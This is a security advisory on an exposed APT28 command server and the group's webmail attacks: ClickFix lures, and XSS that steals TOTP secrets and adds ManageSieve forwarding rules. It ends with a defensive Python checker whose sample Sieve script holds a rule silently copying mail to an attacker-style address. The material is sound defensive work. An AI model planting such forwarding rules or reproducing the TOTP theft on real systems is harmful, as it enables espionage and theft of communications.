APT28 OPSEC blunder exposes espionage operations targeting European entities

Date : March 07, 2026

In March 2026, researchers from Hunt.io and then Ctrl-Alt-Intel uncovered an operational security (OPSEC) mistake made by the APT28 group, also known as FancyBear, Forest Blizzard, Sednit or Sofacy (see our ATK sheet CERT-IST/ATK-2016-013). This group is linked to Russia's military intelligence directorate (GRU, unit 26165).

The mistake is simple but far-reaching: APT28 operators left directories on a command and control (C&C) server openly browsable from the Internet. This server had been known to the Ukrainian government CERT (CERT-UA) since October 2024, yet the group continued to use it for over 500 days without rotating its infrastructure.

The scope of the exposed content is substantial: C&C server source code, exploitation payloads, telemetry logs and, most importantly, exfiltrated data: over 2,800 government and military emails, approximately 240 sets of credentials (including TOTP secrets used for multi-factor authentication) and more than 11,500 contact addresses. The identified victims are government and military entities in Ukraine, Romania, Bulgaria, Greece, Serbia and North Macedonia, several of which are NATO members.

Observed tactics

The exposed infrastructure reveals two distinct methods used by APT28 to compromise its targets:

The first relies on spear-phishing campaigns using ClickFix lures (fake CAPTCHA pages) that trick the victim into running a command on their workstation, triggering the download of a Metasploit implant.

The second targets Roundcube and SquirrelMail webmail platforms through malicious JavaScript injection (XSS). The code executes within the victim's authenticated session and performs two actions: first, it silently extracts the TOTP secret configured in the authentication plugin, enabling the attacker to generate valid 2FA codes at any time without physical access to the victim's device. Second, it leverages the ManageSieve protocol to create a forwarding rule that silently copies all incoming emails to an attacker-controlled address. This rule persists even after the initial XSS vector is closed, providing long-term access to the victim's communications.

Key takeaways

This inadvertent exposure provides a rare window into the inner workings of a state-sponsored espionage operation. Several lessons can be drawn:

  1. First, even groups considered highly capable make basic mistakes. The fact that APT28 used the same server for over 500 days, despite it having been publicly attributed, challenges the common assumption that state-level attack infrastructure is quickly rotated.
  2. Second, the technique of stealing TOTP secrets via XSS highlights a significant limitation of TOTP-based multi-factor authentication: if the web environment where the secret is configured is compromised, 2FA can be bypassed transparently and persistently.
  3. Finally, for defenders, this case underscores the importance of hardening and monitoring self-hosted webmail platforms (Roundcube, SquirrelMail), regularly auditing ManageSieve filtering rules for unauthorized forwarding, and more broadly not treating 2FA as an absolute safeguard when the underlying application is itself vulnerable.
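As an added example (not part of the CERT-IST advisory or any tool it mentions), the following Python check illustrates the audit recommended in the last point: it scans a user's Sieve script, as retrieved through ManageSieve, for `redirect` actions and flags any that forward mail outside the organisation, noting whether the `:copy` tag is used, which keeps the original in the mailbox so the victim notices nothing. The sample script and the internal-domain list are constructed assumptions.

```python
import re

# Constructed sample Sieve script: one legitimate filter, one commented-out
# rule, one silent external copy and one internal redirect.
SAMPLE_SIEVE = """\
# Spam handling (legitimate)
require ["fileinto", "copy"];
if header :contains "subject" "[SPAM]" {
    fileinto "Junk";
}
# redirect "commented@out.example";  <- a comment, must not be flagged
if true {
    redirect :copy "collector@attacker.example";
}
redirect "archive@corp.example";
"""

# Assumed set of domains the organisation considers internal.
INTERNAL_DOMAINS = {"corp.example"}

# Sieve comments: '#' to end of line, or bracketed /* ... */ blocks.
# Limitation: a '#' inside a quoted string would also be stripped.
COMMENT_RE = re.compile(r"#[^\n]*|/\*.*?\*/", re.S)

# A redirect action, any tagged arguments (e.g. :copy) and the quoted target.
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s*"([^"]+)"')


def find_redirects(script):
    """Return (target_address, silent_copy) for every redirect action,
    ignoring rules that appear only inside comments."""
    cleaned = COMMENT_RE.sub("", script)
    return [(m.group(2).strip().lower(), ":copy" in m.group(1))
            for m in REDIRECT_RE.finditer(cleaned)]


def suspicious_forwards(script, internal_domains=INTERNAL_DOMAINS):
    """Flag redirects whose target domain is not one of the organisation's."""
    findings = []
    for addr, silent in find_redirects(script):
        domain = addr.rpartition("@")[2]
        if domain not in internal_domains:
            findings.append({"target": addr, "silent_copy": silent})
    return findings


if __name__ == "__main__":
    for f in suspicious_forwards(SAMPLE_SIEVE):
        print(f"external forward to {f['target']} (silent copy: {f['silent_copy']})")
```

Run against every mailbox's active script, an empty result is the expected baseline; any hit, especially a silent `:copy` to an unknown domain, warrants checking when the rule was created and from which session.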

For more information
